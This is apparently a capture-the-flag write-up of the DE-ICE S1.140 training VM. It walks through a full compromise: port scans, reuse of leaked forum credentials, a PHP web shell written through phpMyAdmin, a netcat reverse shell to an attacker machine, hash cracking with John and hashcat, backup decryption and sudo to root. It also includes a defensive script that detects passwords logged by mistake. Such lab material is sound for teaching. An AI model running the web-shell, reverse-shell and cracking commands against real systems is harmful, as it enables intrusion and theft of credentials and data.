Many thanks to Michael N. and Patrick B for putting this together, it really was fairly close to a real-world scenario.
To solve this challenge you will need the following:
1. Kali Linux (or another suitable platform)
2. A copy of the darkc0de.lst wordlist, which can be downloaded from http://www.filecrop.com/darkc0de.lst.html
You have been employed by 'LazyAdmin Corp' to pen test their network. You have gained a footing in the organisation and now you're looking to extract some sensitive information. You've determined that this information is held on one of their servers, and now you're attempting to break into that server to extract it.
Step 1 - Finding the Machine
When first fired up, the DE-ICE S1.140 machine acquires an IP address via DHCP, so the first step is finding it. My network automatically leased addresses in the 10.20.30.0/24 range out to clients, so I know it's on that network somewhere.
nmap -n -sn 10.20.30.0/24
It appears as though 10.20.30.3 is the one I want (I already know what the other machines are).
Step 2 - Port and Service Scanning
OK, the next step is to find out which ports are open on the machine, and hopefully which services are listening on those ports. Time to fire up the trusty nmap.
nmap -sS -n -A -p- 10.20.30.3
Nmap tells me the following ports are open:
21/tcp - FTP - Anonymous logins allowed
22/tcp - SSH
80/tcp - http Webserver
443/tcp - https Webserver
993/tcp - POP3S
995/tcp - IMAPS
Ok, so it looks like there is FTP, SSH, a Webserver, and a mailserver running.
Step 3 - Exploring FTP
As anonymous FTP access is allowed, that will be the first port of call. A quick poke around shows us that there is a folder called 'incoming', but that only members of the ftp group have read access into it. A quick file upload shows that we can write into the folder, but read nothing from it. We'll come back to this later on.
Step 4 - Exploring the HTTP Webserver
Firing up a browser and pointing it to the IP address of the DE-ICE S1.140 machine gives us an HTML page which explains what we have to do.
Seeing an HTML page usually smacks of something else being hosted on the webserver, so let's fire up dirBuster and have a look.
dirBuster tells us that there is a forum being hosted on the webserver as well.
A quick look around the forum shows the following things
1. There are four users of the forum (admin, mbrown, rhedley, swillard)
2. The SWillard user used to be called SRaines
3. There is a large post entitled "Login Attacks" by MBrown that looks like it's an SSH log dump
Let's take a closer look at that SSH log file. It looks like someone was attempting to brute force their way onto one of the Lazy Admin Corp servers, trying various usernames and passwords, all of them failing. If we look closer though, we can see that one of the login attempts succeeded.
The mbrown user successfully logged into this machine from the IP address of 10.0.0.23. If we search for all logins to this machine from this IP address we turn up another entry in the log, !DFiuoTkbxtdk0!, one that looks suspiciously like a password.
It looks like MBrown made the common mistake of typing their password into the username field, and then immediately attempted to login again with the correct details.
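A defender-side check for the mistake just described, added here as an example and not part of the original post: it scans sshd log lines for a password-looking token in an "Invalid user" entry that is followed shortly by an accepted login from the same source IP, the signal that a credential has been written into the log and should be rotated before the log is shared anywhere. The log lines, the regexes and the heuristic are constructed for this example.

```python
import re
from datetime import datetime

# Constructed sshd log excerpt (not the post's "Login Attacks" dump): the 10:01:09
# line is a password-like token in the username field, then a real login from the same IP.
SAMPLE_LOG = """\
Jan 11 10:01:02 webhost sshd[2101]: Failed password for invalid user test from 10.0.0.23 port 50110 ssh2
Jan 11 10:01:09 webhost sshd[2103]: Invalid user Tr0ub4dor&3! from 10.0.0.23
Jan 11 10:01:15 webhost sshd[2105]: Accepted password for mbrown from 10.0.0.23 port 50112 ssh2
Jan 11 10:02:00 webhost sshd[2110]: Invalid user admin from 192.0.2.7
Jan 11 10:02:30 webhost sshd[2112]: Invalid user oracle from 192.0.2.7
"""

TS = r"(?P<ts>\w{3} +\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
INVALID = re.compile(TS + r"Invalid user (?P<name>\S+) from (?P<ip>\S+)")
ACCEPTED = re.compile(TS + r"Accepted \w+ for (?P<name>\S+) from (?P<ip>\S+)")

def looks_like_password(name):
    """Heuristic: usernames are short, mostly lowercase words; a token of 8+
    characters mixing three or more of lower/upper/digit/punctuation is more
    likely a password that landed in the username field."""
    classes = sum([any(c.islower() for c in name), any(c.isupper() for c in name),
                   any(c.isdigit() for c in name), any(not c.isalnum() for c in name)])
    return len(name) >= 8 and classes >= 3

def find_leaked_credentials(log_text, window_seconds=120):
    """Return one finding per password-like 'Invalid user' token that was
    followed, within window_seconds, by an accepted login from the same IP."""
    invalid, accepted = [], []
    for line in log_text.splitlines():
        for pattern, bucket in ((INVALID, invalid), (ACCEPTED, accepted)):
            m = pattern.match(line)
            if m:
                # syslog timestamps carry no year; fine for deltas inside one file
                bucket.append((datetime.strptime(m["ts"], "%b %d %H:%M:%S"), m["name"], m["ip"]))
    findings = []
    for ts_i, token, ip in invalid:
        if not looks_like_password(token):
            continue
        for ts_a, account, ip_a in accepted:
            delta = (ts_a - ts_i).total_seconds()
            if ip_a == ip and 0 <= delta <= window_seconds:
                findings.append({"ip": ip, "leaked_token": token, "account": account, "seconds": delta})
                break
    return findings

if __name__ == "__main__":
    for f in find_leaked_credentials(SAMPLE_LOG):
        print(f"rotate {f['account']}: password-like token logged {f['seconds']:.0f}s before its login from {f['ip']}")
```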
Before we go exploring any more, let's have a look at the HTTPS service.
Step 5 - Exploring the HTTPS Webserver
Time to fire up the trusty dirBuster again, this time against the HTTPS port. dirBuster tells us that there are another two services available, webmail and phpMyAdmin.
Step 6 - Using MBrown's credentials
The first place to try MBrown's credentials is the forum. They work, allowing us to log in. We don't appear to have the rights to do anything here (such as upload files), however we can get into our own profile, which gives us the following information:
1. The user's full name is Mark Brown
2. The user's email address is email@example.com
The second place to try MBrown's credentials is the webmail service. We log in here with the same password as the forum, but with the email address of firstname.lastname@example.org as our username.
Success! This lands us two emails. The first of which is an email from Sandy Willard, who has the email address of email@example.com, telling Mark Brown that he appears to be reusing credentials in multiple locations (Yep, she's right).
The second email gives us the root login credentials for a MySQL server.
Step 7 - Logging into phpMyAdmin
We can now log into the phpMyAdmin site using the credentials in MBrown's email.
This contains the databases for the webmail and the forum. The following tables contain password hashes for each of the services:
SELECT user_name,user_real_name,user_pw FROM forum.mlf2_userdata
SELECT username,password,name,maildir FROM mail.mailbox
We'll record these for cracking later.
Step 8 - Getting a shell on the box
Now we have phpMyAdmin access, we can get a shell on the box, but first we need to find a directory that we can write to, and also access from the website.
As the webserver is running the mylittleforum software, this is a good place to start our hunt. A quick google turns up a possible location in our very first link.
"...the write permission of the subdirectory templates_c (CHMOD 770, 775 or 777) might need to be changed in order that they are writable"
Can we access this directory from the webserver? Yes we can!
From the phpMyAdmin page, let's create a table to hold our shell.
CREATE TABLE `test`.`phpshell` (`track1` VARCHAR( 1000 ) NOT NULL ) ENGINE = MYISAM;
Now let's create a quick shell to go in that table.
insert into phpshell values
$cmd = ($_REQUEST['cmd']);
We now have to guess where the forum is actually hosted on the server. Chances are it's in the default location of /var/www/, so let's try that first.
select * into dumpfile '/var/www/forum/templates_c/phpbackdoor.php' from phpshell
If everything has gone well, we should be able to call the phpshell with the following URL
Well the good news is that our php code has been uploaded, but the bad news is that the webserver is running as the low level apache user.
Time to get a real shell on the machine. First we create a named pipe to send data in and out of
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=mknod /var/www/forum/templates_c/backpipe p
Next we setup a netcat listener on our local Kali machine
nc -l -p 444
And finally we setup a reverse connection from our DE-ICE machine to our Kali machine
http://10.20.30.3/forum/templates_c/phpbackdoor.php?cmd=/bin/sh -c "/bin/bash 0</var/www/forum/templates_c/backpipe | nc 10.20.30.5 444 1>/var/www/forum/templates_c/backpipe"
Success! We now have a very limited shell on our DE-ICE machine. We can now spawn a slightly better shell which will allow us to migrate to other users.
python -c 'import pty;pty.spawn("/bin/bash")'
Step 9 - Cracking the hashes
We've now got a low-level privileged user on the machine, but we need access to a higher privilege one. Time to crack the hashes we obtained earlier from the forum and the webmail in the MySQL database.
First up are the webmail hashes. These look like plain MD5 hashes, so let's put them in the following format and let John the Ripper have a crack at them with the darkc0de wordlist.
john --format=raw-md5 --wordlist=darkc0de.lst webmailhashes
Note: when you want John to display the results of cracking these hashes, you need to specify --format=raw-md5 as well, otherwise they won't display.
Success! We learn the following passwords:
- RHedley - tum-ti-tum
- SWillard - Austin-Willard
Time for the forum hashes. John the Ripper doesn't have a clue what format these are in, and Google doesn't help much either. The hashes must be stored in a strange format. Luckily, the forum software is open source, so we can find out how they generate the hashes.
A bit of searching around shows us that the password functions are stored in the 'functions.inc.php' file within the software.
Specifically we can reverse engineer the 'is_pw_correct' function to find out what happens when a user enters their password. The code of this function is below:
<?php
// is_pw_correct() from mylittleforum's functions.inc.php as quoted above, with the braces and
// function wrapper restored so the branches are unambiguous
function is_pw_correct($pw, $hash)
{
    if (strlen($hash) == 50) { // salted sha1 hash: 40 hex chars of sha1, then a 10 character salt
        $salted_hash = substr($hash, 0, 40);
        $salt = substr($hash, 40, 10);
        if (sha1($pw.$salt) == $salted_hash) return true; // loose == is the original's; hash_equals() is the strict form
        else return false;
    } elseif (strlen($hash) == 32) { // unsalted md5 hash generated in an older version
        if ($hash == md5($pw)) return true;
        else return false;
    } else return false;
}
Our password hashes are 50 characters in length, so they're Salted SHA1 hashes. The salt forms the last 10 characters of the hash, and the password hash itself is the first 40 characters.
Let's create a file with the hashes in the following format:
John the Ripper still can't deal with these types of hashes, but the hashcat tool can
hashcat -m 110 forum_passwords darkc0de.lst
Success! We've obtained another password, and although it's one we've already got, it shows that users are using the same password for multiple services.
- RHedley - tum-ti-tum
Time to try out these passwords directly on the shell we have on the DE-ICE machine
Step 10 - Obtaining the FTP Backup and Backup Script
Using the passwords we've cracked, let's try to escalate our privileges on the DE-ICE system. The SWillard password (Austin-Willard) doesn't appear to have been reused (well done Sandy), but the RHedley one (tum-ti-tum) does.
su - rhedley
Looking around the filesystem we find that we now have read access into the /home/ftp/incoming folder, as rhedley is a member of the ftpadmin group. In here we find a file that looks like an encrypted backup of the host. Let's move this to our Kali machine for later on, via the templates_c folder we were using earlier.
cp /home/ftp/incoming/backup_webhost_130111.tar.gz.enc /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc && chmod 666 /var/www/forum/templates_c/backup_webhost_130111.tar.gz.enc
We also find a file called "backup.sh" in the /opt/ directory. This is protected by extended ACLs so normal users cannot read it, but the members of the ftpadmin group have special read permissions. This can be verified with the following command:
This file contains the encryption type and password used for encrypting the FTP backup.
Using these two files we can decrypt the backup file on our Kali machine.
openssl aes-256-cbc -in backup_webhost_130111.tar.gz.enc -out backup_webhost_130111.tar.gz -d -pass pass:wpaR9V616xrDTy98L7Uje2DDU5hWtWhs
Now we have an unencrypted archive, it's just a matter of decompressing the file.
tar -zxvf backup_webhost_130111.tar.gz
Step 11 - Cracking the Shadow file
Looking around inside the backup, there are two files that jump out, the passwd file and the shadow file.
Time to put John the Ripper to use again to see if we can pull out any more interesting passwords
unshadow webhost/etc/passwd webhost/etc/shadow > unshadowed
john --wordlist=darkc0de.lst unshadowed --format=sha512crypt
Aha! We have the password for the sraines user of brillantissimo
But who is the sraines user? They don't exist on the DE-ICE system. Remember back when we first started though - someone mentioned in the forums that they got married and changed their last name from raines to willard....
Step 12 - Stealing the Secrets
First step is finding out what permissions SWillard has over the DE-ICE machine
It seems as though SWillard has the ability to run anything they like, so let's get some root privileges.
sudo su -
Now we're the root user, time to have a look around. The typical place to store information you want only root to have access to is in the /root/ directory, so lets have a look there first.
We find a file called secret.jpg...which looks very suspicious. If we open it up....?